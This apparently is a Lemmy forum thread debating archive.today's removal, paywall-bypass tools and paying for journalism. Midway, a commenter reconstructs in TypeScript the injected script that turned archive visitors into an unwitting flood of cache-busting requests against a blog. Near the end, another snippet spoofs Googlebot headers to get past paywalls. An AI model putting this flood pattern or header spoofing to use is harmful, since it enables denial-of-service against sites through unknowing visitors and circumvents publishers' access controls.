That’s very 1984 of them
As someone who uses Bypass Paywalls Clean, this is so frustrating.
Bypass Paywalls Clean was chased off of the Firefox Add-ons site, chased off of GitLab, and chased off of GitHub via DMCA takedown notices for copyright infringement. It is now hosted on the Russian GitFlic.ru.
We all know Russia sucks in a litany of ways, but one way it doesn’t suck is that it is one of the few countries left that has truly thrown all caution to the wind and said “fuck it” to respecting the international Big Copyright norms promoted and deeply shaped by the US copyright cabal (RIAA/MPAA).
We have spent the better part of two decades watching the DMCA get used as an outright weapon to silence information that corporations and governments find inconvenient, mostly because that information is wildly incriminating for them. It works so well because a huge share of the world’s internet has been consolidated onto US hosting infrastructure like AWS and Cloudflare, putting enormous amounts of the internet under the direct reach of US laws like the DMCA.
Websites like Anna’s Archive, Libgen, and Sci-Hub live because they use hosting in countries that allow them to bypass these kinds of restrictions. Russia is one of the most common countries for them to host the data out of due to the lack of enforcement of copyright laws, although it is obviously not the only country these sites use.
Until we are able to make international copyright protections reasonable instead of over-zealous and aggressively abusive, we will all have to put up with such sites being hosted in countries that are otherwise very unsavory to associate with.
We live in the kind of world that early piracy pioneers, such as the original creators of The Pirate Bay, were trying to prevent from becoming reality. The American copyright cabal fought tooth and nail to change Sweden’s interpretation of copyright law so they could send those men to prison.
hey thanks, i had never heard of that bypass paywalls firefox addon
There’s also a version for Chrome if you swing that way.
I do not because I don’t like ads on YouTube, but thx.
Ironically, when Russia was joining the World Trade Organization in the early 2010s, one requirement was for them to do something about pirate sites, namely torrent-sharing ones. So, iirc, the domain torrents.ru was taken away from what is now called RuTracker, and they blocked many other sites, which stay blocked to this day.
And now Firefox completely bans it from even being sideloaded.
I don’t think the issue is paywalls. I think the issue is the personal actions of the owner. I also really don’t think Russia plays into this. Again, the personal actions of the owner of archive[.]today were the reason it was removed. The site was used by the owner to personally attack someone.
Good reminder to donate to web.archive.org
I do hope this move results in more support for the IA/Wayback Machine and helps them to update some of their crawler tech — thanks to the rise of AI, some sites are effectively (thru captchas etc.) or actively (through straight-up greed [coughRedditcough]) blocked from being archived almost entirely, which is frustrating for legit archivists/contributors.
For anyone curious, I looked into the DDoSing: a short string of JavaScript was added to archive[.]today that made a background request to the blog with a randomly generated search parameter. Every time someone viewed an archive, they unknowingly sent a request to the blog under attack.
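A minimal sketch of the kind of snippet described above; the actual code wasn’t published here, and the target domain and names are placeholders I made up:

```typescript
// Hypothetical reconstruction; "victim.example" stands in for the blog
// that was actually targeted.
const target = "https://victim.example/blog";

// Append a random search parameter so every hit bypasses browser and
// CDN caches and lands directly on the origin server.
function makeBusterUrl(base: string): string {
  const cacheBuster = Math.random().toString(36).slice(2);
  return `${base}?q=${cacheBuster}`;
}

// Called once per archive view: a background request the visitor
// never notices, with any failure swallowed silently.
function pingTarget(): void {
  fetch(makeBusterUrl(target)).catch(() => {
    /* errors ignored */
  });
}
```

With thousands of archive views per minute, that’s a distributed flood of cache-busting requests without any of the visitors knowing they’re participating.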
Good reminder to pay for journalism.
The Guardian, Le Monde, El País, Tageszeitung and many others need subscribers to stay independent of the oligarchs.
Also remember that the journalists who need support the most are at local papers and news stations. The big ones have plenty of donors, and while they’re still worth supporting, they are less likely to completely collapse than the news outlets run in your city.
Go look for that independent source. They will report more news that actually affects you as well.
guardian is surviving by slowly becoming a tabloid. not sure if i would have paid for it anyway, and im not sure if this was preventable by paying for it in the first place.
yeah and they’re also transphobic af as a policy. don’t give them a damn cent
https://www.buzzfeed.com/patrickstrudwick/guardian-staff-trans-rights-letter
can also find more stuff by just looking up “the guardian transphobia”
Paying for journalism is ideal, but unfortunately makes it difficult to cite/link to a source the way Wikipedia needs as a way to ensure the information remains open and accessible.
Admittedly, I’m not familiar enough with these outlets to know if those paywalls are significant, but the problem with direct article links is that those links can change. Archival services (I suppose not archive[.]is) are important for ensuring those articles remain accessible in the format they were presented in.
I’ve come across a number of older Wikipedia articles about more minor or obscure events where links lead to local news outlet websites that no longer exist or were consumed by larger media outlets and as a result no longer provide an appropriate citation.
Paying for journalism just reinforces that those who don’t pay don’t get it, i.e. more paywalls, not fewer.
Everyone seems to be ignoring the fact that he only did this in response to a malicious dox attempt.
He only modified archived pages in response to a dox attempt?
And the thing is, the discovery of the modified pages revealed that it wasn’t even the first time he’d modified pages. And he used a real person’s identity to try and shift blame.
Irrespective of the doxxing allegations, if he’s done all this multiple times already, it means the page archives can’t be trusted AND there’s no guarantee that anything archived with the service will be available tomorrow.
Seems like we need to switch to URLs that contain the SHA256 of the page they’re linking to, so we can tell if anything has changed since the link was created.
Actually a pretty good idea.
Only works for archived pages though, because for any regular page, a large portion of the page will be dynamically generated; hashing the HTML will only say the framework hasn’t changed.
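The hash-in-URL idea could look something like this; the `#sha256=` fragment scheme here is invented purely for illustration, nothing like it exists in real archive links:

```typescript
import { createHash } from "node:crypto";

// Embed a content hash in the link fragment so readers can verify the
// snapshot hasn't been silently edited since the link was created.
function hashLink(archiveUrl: string, pageHtml: string): string {
  const digest = createHash("sha256").update(pageHtml, "utf8").digest("hex");
  return `${archiveUrl}#sha256=${digest}`;
}

// Recompute the hash over the page as served and compare it to the
// digest baked into the link.
function verify(link: string, pageHtml: string): boolean {
  const expected = link.split("#sha256=")[1];
  const actual = createHash("sha256").update(pageHtml, "utf8").digest("hex");
  return expected === actual;
}
```

As noted above, this only makes sense for static archived snapshots: hashing a live page with dynamic content would produce a different digest on every load.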
As they should since it doesn’t matter.
Yeah, someone being shitty to you doesn’t mean you go full-fledged shitty in return; it kind of proves your lack of trustworthiness to begin with. It’s like Nazis being like “leftists were mean to me by explaining how my politics made me a Nazi, so I’m gonna show them by Nazi-ing even harder! They forced me to be like this!” It kind of betrays the argument that the reason you got that way was because leftists were mean to you.
Unfortunately, they shot themselves in the foot by responding the way they did. They basically did the job of anyone who wants them taken down and not trusted. It was probably the worst way they could have reacted. Such a tragedy to lose such a valuable website.
Yeah, ESH. His response of editing an archive showed the site to be unreliable as an archive. DDOSing from the site as a counter to the dox attempt caused the site serious reputational harm as well.
It sucks because his site was actually more reliable than The Internet Archive.
https://lemmy.world/c/ukraine was where i saw this. i didn’t write it. thought lemmy would have linked to the original, was wrong. FYI
Okay so, what is the current go-to alternative for bypassing paywalls?
i’ve had consistently good luck with the archive.org wayback machine
copy the headline and find the same thing free somewhere else. usually it’s a news site full of unreadable slop. pay walls used to be almost worth bypassing. no more. just another money grab, pretending to protect valuable information. not
Fair point. Very few if any news sites provide unique articles.
The root of the problem is that Wikipedia doesn’t keep local snapshots, which leaves its articles vulnerable to eroding sources.
Is it reasonable for them to keep their own local snapshots?
That’s not a trivial amount of work and data, particularly if it’s multimedia.
I think it’s a concerning issue affecting long-term viability of the platform. It’ll only get worse as time goes on and sources go offline.
How does the paywall circumvention of archive.today work?
It identifies itself as a Google (or other search engine) crawler, which sites often allow through and serve the full content to, for better SEO.
I guess that they genuinely owned subscriptions for popular paywalled sites.
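The crawler-identification trick is just a spoofed User-Agent header; a minimal sketch, assuming a site that trusts the UA string alone (real Googlebot verification also checks reverse DNS, which this would fail):

```typescript
// Headers that present the request as Google's documented crawler.
// Some paywalls also check the referrer, so a Google referrer is
// included too.
function crawlerHeaders(): Record<string, string> {
  return {
    "User-Agent":
      "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "Referer": "https://www.google.com/",
  };
}

// Fetch a page while posing as a crawler; whether the full article
// comes back depends entirely on the site's bot detection.
async function fetchAsCrawler(url: string): Promise<string> {
  const res = await fetch(url, { headers: crawlerHeaders() });
  return res.text();
}
```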